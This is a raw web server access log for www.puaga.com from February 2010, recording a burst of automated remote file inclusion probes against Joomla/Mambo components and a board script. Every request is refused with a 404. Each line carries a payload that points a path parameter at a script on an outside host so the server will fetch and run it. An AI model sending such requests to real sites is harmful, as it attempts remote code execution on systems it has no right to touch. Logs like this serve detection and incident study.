91.121.146.197 - - [07/Feb/2010:05:23:14 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:23:14 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:24:30 -0800] "GET /logs/access_100113.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:05:28:09 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:05:28:09 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:11 -0800] "GET /logs/access_091231.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:11 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:11 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:11 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:05:28:12 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:05:28:12 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:05:28:12 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:05:28:13 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:05:28:14 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:05:28:14 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:16 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:16 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:16 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:19 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:20 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:20 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:20 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:20 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:20 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:05:28:22 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:05:28:22 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:05:28:22 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:23 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:23 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:23 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:23 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:23 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:23 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:27 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:27 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:27 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:05:28:28 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:05:28:28 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:05:28:28 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:32 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:32 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:32 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:05:28:34 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:05:28:34 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:05:28:34 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:34 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:34 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:34 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:05:28:35 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:05:28:37 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:05:28:37 -0800] "GET /logs/access_091231.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:38 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:38 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:38 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:42 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:43 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:43 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:05:28:46 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:47 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:47 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:47 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:50 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:50 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:28:50 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:05:28:51 -0800] "GET /logs/access_091231.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:08 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:09 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:09 -0800] "GET /logs/access_100114.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:29:10 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:10 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:11 -0800] "GET /logs/access_100114.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:17 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:29:19 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:19 -0800] "GET /logs/access_100114.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:29:20 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:29:20 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:05:29:24 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [07/Feb/2010:05:29:27 -0800] "GET /logs/access_100113.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [07/Feb/2010:05:29:27 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [07/Feb/2010:05:29:27 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:32 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:36 -0800] "GET /logs/access_100114.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:29:40 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:29:40 -0800] "GET /logs/write_update.php?board_skin_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:29:40 -0800] "GET /write_update.php?board_skin_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:48 -0800] "GET /logs/access_100114.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:49 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:57 -0800] "GET /logs/access_100114.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:29:59 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:05:30:02 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:05:30:02 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:05:30:02 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:30:07 -0800] "GET /logs/access_100125.log%20%20/write_update.php?board_skin_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [07/Feb/2010:05:30:10 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:05:30:33 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:30:53 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:30:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:30:57 -0800] "GET /logs/access_100114.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:31:03 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:06 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
